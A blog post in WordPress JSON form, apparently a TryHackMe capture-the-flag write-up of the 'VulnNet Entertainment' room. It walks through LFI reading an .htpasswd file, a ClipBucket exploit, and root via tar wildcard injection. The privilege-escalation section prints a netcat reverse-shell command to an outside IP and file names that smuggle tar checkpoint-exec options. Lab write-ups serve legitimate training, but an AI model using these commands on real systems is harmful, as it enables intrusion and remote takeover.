{"id":501,"date":"2026-01-13T09:34:44","date_gmt":"2026-01-13T09:34:44","guid":{"rendered":"https:\/\/hackingwithj.com\/?p=501"},"modified":"2026-01-06T09:36:13","modified_gmt":"2026-01-06T09:36:13","slug":"thm-vulnnet-entertainment","status":"publish","type":"post","link":"https:\/\/hackingwithj.com\/?p=501","title":{"rendered":"THM: VulnNet Entertainment"},"content":{"rendered":"\n<p>New year, new room. Time to get back into the rhythm with <strong>VulnNet Entertainment<\/strong>, a solid medium-difficulty TryHackMe box that combines web exploitation, patience, and a privilege escalation technique I hadn\u2019t abused before.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">NMAP<\/h2>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-9d5b1107364c037d862b5209a61454ab\"><code>PORT   STATE SERVICE VERSION\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)\n|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)\n|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (ED25519)\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\n|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496\n|_http-title: VulnNet\n| http-methods: \n|_  Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n\n\n\n<p>Nothing exotic here: SSH and a web server. 
That immediately tells me this box will likely revolve around <strong>web exploitation leading to SSH or local privilege escalation<\/strong>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">HTTP (80)<\/h2>\n\n\n\n<p>The main website was very basic \u2014 no obvious functionality, no interesting forms:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"348\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1024x348.png\" alt=\"\" class=\"wp-image-502\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1024x348.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-300x102.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-768x261.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1536x522.png 1536w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image.png 1907w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Directory &amp; content discovery<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Gobuster<\/strong> \u2192 nothing useful<\/li>\n\n\n\n<li><strong>ffuf<\/strong> \u2192 found a subdomain: <code>broadcast.vulnnet.thm<\/code><\/li>\n<\/ul>\n\n\n\n<p>This returned a <strong>401 Unauthorized<\/strong>, and browsing to it revealed a login page. 
At this point I had:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A login page<\/li>\n\n\n\n<li>No confirmed usernames<\/li>\n\n\n\n<li>No obvious functionality to abuse<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\"><\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Initial testing &amp; dead ends<\/h3>\n\n\n\n<p>I briefly considered brute-forcing the login on the <code>broadcast<\/code> subdomain using Hydra, but once I saw how slow it would be \u2014 and with no confidence in the username \u2014 I decided not to tunnel-vision on it.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"180\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-1024x180.png\" alt=\"\" class=\"wp-image-503\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-1024x180.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-300x53.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde-768x135.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/imagde.png 1250w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I also:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Tried a few basic SQLi payloads \u2192 no result<\/li>\n\n\n\n<li>Checked default credentials \u2192 no luck<\/li>\n<\/ul>\n\n\n\n<p>Time to step back and look deeper.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Finding the entry point<\/h2>\n\n\n\n<p>Digging further into the <strong>JavaScript and page behavior<\/strong>, one thing stood out: a <strong>parameter<\/strong> on the main page that looked user-controlled.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"313\" height=\"31\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1.png\" alt=\"\" class=\"wp-image-504\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1.png 313w, 
https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-1-300x30.png 300w\" sizes=\"auto, (max-width: 313px) 100vw, 313px\" \/><\/figure>\n\n\n\n<p>I fired up <strong>Burp<\/strong>, intercepted the request, and started replaying it. After some trial and error, it became clear: <strong>Local File Inclusion (LFI)<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"513\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-1024x513.png\" alt=\"\" class=\"wp-image-505\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-1024x513.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-300x150.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2-768x385.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-2.png 1536w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>At first, this didn\u2019t immediately give me anything useful. Reading files like:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>index.php<\/code><\/li>\n\n\n\n<li><code>signup.php<\/code><\/li>\n<\/ul>\n\n\n\n<p>didn\u2019t reveal credentials, but it <em>did<\/em> tell me something important:<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>The application is running <strong>ClipBucket 4.0<\/strong><\/p>\n<\/blockquote>\n\n\n\n<p>A quick lookup showed known vulnerabilities, including one listed on Exploit-DB:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/www.exploit-db.com\/exploits\/44250\">https:\/\/www.exploit-db.com\/exploits\/44250<\/a><\/li>\n<\/ul>\n\n\n\n<p>However, I couldn\u2019t directly reach the vulnerable functionality yet. Back to thinking like the system. Apache often stores HTTP authentication credentials in predictable locations. 
One common file stood out: <code>\/etc\/apache2\/.htpasswd<\/code>. Including this file via LFI worked \u2014 and it contained a <strong>password hash<\/strong>:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"529\" height=\"110\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-3.png\" alt=\"\" class=\"wp-image-506\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-3.png 529w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-3-300x62.png 300w\" sizes=\"auto, (max-width: 529px) 100vw, 529px\" \/><\/figure>\n\n\n\n<p>Cracking it with <strong>John the Ripper<\/strong> finally gave me valid credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"822\" height=\"199\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4.png\" alt=\"\" class=\"wp-image-507\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4.png 822w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4-300x73.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-4-768x186.png 768w\" sizes=\"auto, (max-width: 822px) 100vw, 822px\" \/><\/figure>\n\n\n\n<p>At last: authenticated access.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"211\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-1024x211.png\" alt=\"\" class=\"wp-image-508\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-1024x211.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-300x62.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-768x158.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5-1536x316.png 1536w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-5.png 1913w\" 
sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Exploitation<\/h2>\n\n\n\n<p>With valid credentials, I revisited the ClipBucket exploit.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There is a <strong>Metasploit module<\/strong> available:<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"475\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-1024x475.png\" alt=\"\" class=\"wp-image-510\" style=\"aspect-ratio:2.155848416908186;width:667px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-1024x475.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-300x139.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7-768x356.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-7.png 1267w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>There are also <strong>community Python scripts<\/strong> on GitHub:<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"428\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-1024x428.png\" alt=\"\" class=\"wp-image-509\" style=\"aspect-ratio:2.3926313888387214;width:676px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-1024x428.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-300x125.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-768x321.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6-1536x642.png 1536w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-6.png 1546w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>I chose to go 
<strong>manual first<\/strong> to understand what was happening. At first, nothing worked \u2014 until I realized I had <strong>mistyped the password<\/strong>.<br>Once corrected, the exploit succeeded and I landed a shell.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"464\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-1024x464.png\" alt=\"\" class=\"wp-image-511\" style=\"width:736px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-1024x464.png 1024w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-300x136.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8-768x348.png 768w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-8.png 1523w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Lesson learned (again):<\/p>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>Sometimes it\u2019s not the exploit \u2014 it\u2019s you.<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">Post-exploitation &amp; Enumeration<\/h2>\n\n\n\n<p>After stabilizing the shell, I confirmed I was running as: <code>www-data<\/code>. Very restricted \u2014 so enumeration was key. 
I ran <strong>LinPEAS<\/strong>, which highlighted something interesting:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A readable <strong>SSH backup file<\/strong> belonging to the user <code>server-management<\/code><\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"797\" height=\"384\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10.png\" alt=\"\" class=\"wp-image-513\" style=\"width:697px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10.png 797w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10-300x145.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-10-768x370.png 768w\" sizes=\"auto, (max-width: 797px) 100vw, 797px\" \/><\/figure>\n\n\n\n<p>Cracking that backup gave me valid SSH credentials.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" width=\"964\" height=\"666\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11.png\" alt=\"\" class=\"wp-image-514\" style=\"width:705px;height:auto\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11.png 964w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11-300x207.png 300w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-11-768x531.png 768w\" sizes=\"auto, (max-width: 964px) 100vw, 964px\" \/><\/figure>\n\n\n\n<p>Now we have:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A real user<\/li>\n\n\n\n<li>A stable SSH session<\/li>\n<\/ul>\n\n\n\n<p>Time to go for root.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege Escalation<\/h2>\n\n\n\n<p>LinPEAS had earlier flagged a backup script in:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"382\" height=\"28\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-9.png\" 
alt=\"\" class=\"wp-image-512\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-9.png 382w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-9-300x22.png 300w\" sizes=\"auto, (max-width: 382px) 100vw, 382px\" \/><\/figure>\n\n\n\n<p>The script looked harmless at first:<\/p>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-743ee51d9e18c87586affcc9a8af908d\"><code>#!\/bin\/bash\n\n# Where to backup to.\ndest=\"\/var\/backups\"\n\n# What to backup. \ncd \/home\/server-management\/Documents\nbackup_files=\"*\"\n\n# Create archive filename.\nday=$(date +%A)\nhostname=$(hostname -s)\narchive_file=\"$hostname-$day.tgz\"\n\n# Print start status message.\necho \"Backing up $backup_files to $dest\/$archive_file\"\ndate\necho\n\n# Backup the files using tar.\ntar czf $dest\/$archive_file $backup_files\n\n# Print end status message.\necho\necho \"Backup finished\"\ndate\n\n# Long listing of files in $dest to check file sizes.\nls -lh $dest\n<\/code><\/pre>\n\n\n\n<p>But this is where it gets interesting.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Tar wildcard injection<\/h3>\n\n\n\n<p>Because <code>$backup_files<\/code> is an unquoted <code>*<\/code>, the shell expands it to every file name in the directory before <code>tar<\/code> runs, so <strong>any file whose name starts with <code>--<\/code><\/strong> is parsed by <code>tar<\/code> as a command-line option rather than as a file to archive. The script does nothing to stop that, such as ending tar\u2019s option list with <code>--<\/code> before the file names. That means we can inject arguments. 
I created:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A reverse shell script<\/li>\n\n\n\n<li>Specially named files to trigger tar\u2019s checkpoint execution<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code has-vivid-purple-color has-text-color has-link-color wp-elements-8c1c466fd11b477093a15509c2ec8591\"><code>echo \"rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&amp;1|nc 192.168.136.183 4444 >\/tmp\/f\" > \/home\/server-management\/Documents\/shell.sh\ntouch \"\/home\/server-management\/Documents\/--checkpoint=1\"\ntouch \"\/home\/server-management\/Documents\/--checkpoint-action=exec=\/bin\/sh shell.sh\"<\/code><\/pre>\n\n\n\n<p>With a listener running, the backup script did the rest. Root shell achieved:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"528\" height=\"137\" src=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-12.png\" alt=\"\" class=\"wp-image-515\" srcset=\"https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-12.png 528w, https:\/\/hackingwithj.com\/wp-content\/uploads\/2026\/01\/image-12-300x78.png 300w\" sizes=\"auto, (max-width: 528px) 100vw, 528px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Learning notes<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>LFI is often a <strong>stepping stone<\/strong>, not the final exploit<\/li>\n\n\n\n<li>When stuck, think like the <strong>underlying service<\/strong> (Apache in this case)<\/li>\n\n\n\n<li>Tar wildcard injection is powerful and easy to miss<\/li>\n\n\n\n<li>Enumeration matters more than rushing exploits<\/li>\n\n\n\n<li>Small mistakes (like a typo) can cost a lot of time<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>New year, new room. Time to get back into the rhythm with VulnNet Entertainment, a solid medium-difficulty TryHackMe box that combines web exploitation, patience, and a privilege escalation technique I hadn\u2019t abused before. 
NMAP Nothing exotic here: SSH and a web server. That immediately tells me this box will likely revolve around web exploitation leading [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"site-container-style":"default","site-container-layout":"default","site-sidebar-layout":"default","disable-article-header":"default","disable-site-header":"default","disable-site-footer":"default","disable-content-area-spacing":"default","footnotes":""},"categories":[8],"tags":[40,29,19,30],"class_list":["post-501","post","type-post","status-publish","format-standard","hentry","category-ctf","tag-ffuf","tag-hydra","tag-lfi","tag-nmap"],"_links":{"self":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/501","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=501"}],"version-history":[{"count":7,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/501\/revisions"}],"predecessor-version":[{"id":517,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=\/wp\/v2\/posts\/501\/revisions\/517"}],"wp:attachment":[{"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=501"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=501"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackingwithj.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=501"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":tru
e}]}}